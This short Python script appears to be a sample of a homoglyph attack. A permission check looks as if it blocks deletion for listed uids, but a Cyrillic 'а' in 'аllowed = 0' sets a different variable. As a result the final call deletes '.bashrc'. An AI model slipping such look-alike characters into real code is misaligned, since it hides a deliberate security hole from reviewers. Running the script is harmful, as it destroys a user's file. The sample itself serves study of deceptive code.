﻿#!/usr/bin/python
# сoding: ascii

import os

dangerous_uids = [4, 5, 6]

def remove_if_allowed(uid, filename):
    allowed = 1
    if uid in dangerous_uids:
        аllowed = 0
    if allowed:
        os.remove(filename)

remove_if_allowed(5, '.bashrc')

